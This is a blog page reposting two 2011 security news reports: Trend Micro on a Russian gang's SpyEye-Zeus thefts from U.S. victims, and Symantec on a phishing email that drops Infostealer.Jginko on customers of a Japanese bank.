A Russian cybergang headed by a mysterious ringleader called 'Soldier' were able to steal $3.2 million from U.S. citizens earlier this year using the SpyEye-Zeus data-stealing Trojan, security company Trend Micro has reported.

Over a six month period from January 2011, Trend found that the Soldier gang had been able to compromise a cross-section of U.S. business, including banks, airports, research institutions, and even the U.S. military and Government, as well as ordinary citizens.

[ Learn how to greatly reduce the threat of malicious attacks with InfoWorld's Insider Threat Deep Dive PDF special report. ]

A total of 25,394 systems were infected between 19 April and 29 June alone, 57 percent of which were Windows XP systems with even Windows 7 registering 4,500 victim systems.

The company has not explained how the sum of $3.2 million was taken, nor from which types of user, but accounts across a wide range of applications were found to have been compromised. The three largest by some margin were Facebook, Yahoo and Google, but eBay, Amazon, PayPal, and Skype also appear on the list.

"'Soldier' has mainly targeted U.S. users and to increase the number of successful infections achieved in the U.S., he even bought U.S. traffic from other cybercriminals. Besides using malware to steal money from the compromised accounts, he also steals user security credentials," Trend Micro said.

"Compromise on such a mass scale is not that unusual for criminals using toolkits like SpyEye, but the amounts stolen and the number of large organizations potentially impacted is cause for serious concern."

Banking Trojans such as SpyEye and the older Zeus (possibly now merged with SpyEye) have been one of the malware stories of the last year, and have featured in a number of high-profile online crime cases.

In the U.K. this included a teen gang said to have stolen as much as £12 million ($18 million) from a range of activities including online bank fraud. Earlier in 2010, a separate gang using Zeus was able to steal up to £20 million ($30 million), police believe.

nb : infoworld Read More...

Recent malware trends clearly show that financial gain is one of the top reasons to be on the dark side of the Internet. Countless threats targeting banking information come and go each day. Stealing banking information is now easier than ever with the availability of toolkits such as Spyeye and Zbot that allow malware authors to target banks of their choice. It is believed that trillions of dollars are deposited in Japanese banks.

Furthermore, the Japanese nation is well known to be a nation of savers, thus making Japanese banks and their customers a potentially lucrative target.

A recent spam attack targeting customers of a leading bank in Japan arrives with an .exe file attachment named with the abbreviation of the bank. When we first observed this attack, we thought that it was a typical spam attack customized through Spyeye. However on closer inspection, we found that this was not the case. It is, in fact, Infostealer.Jginko.

The email appears legitimate except for the sender portion of the bank’s name in the email id, which clearly demonstrates that the email did not come from the bank as the domain in this case is not valid; it is just "co.jp". This is a second level domain and not a fully qualified domain name. The email asks the recipients to renew a "code card". The code card is a card that is provided by the bank to its customers. It contains a matrix of numbers that is used to finalize online transactions (TAN). This is a type of two-factor protection that is used to help protect against straight forward unauthorized account access or transactions. Two-factor protection is widely used by online banking systems and in some cases three-factor authentication is used. To renew the code card as requested by the email, the recipient is asked to open the attachment.

Running the attachment displays a form which the user is requested to fill in. When the form is filled in and the send button is clicked, the threat takes a screenshot and sends it to the IP address of 66.90.100.214 using a predefined user name and password. At the time of investigation, we did not see any screenshots at the remote location. This may indicate that few users are affected by the threat or that the attacker is copying and deleting data on a regular basis.

Social engineering attacks such as this one are effective against users with little security knowledge. The affected bank has posted a message on their website warning users of these types of spam attacks.

nb : symantec

Read More...

[+] Wayc0de's Blog[+]

05/11/11

30/10/11

28/10/11

26/10/11

14/10/11

02/10/11

29/09/11

27/09/11

24/09/11

The Trojan code is crude and can't yet connect to control server, say security firms

23/09/11

20/09/11

19/09/11

Secured boot' will be the biggest new protection; most of the rest are enhancements from what appeared in Windows 7 and earlier

16/09/11

The amounts stolen and the number of large organizations potentially impacted is cause for serious concern, says Trend Micro

15/09/11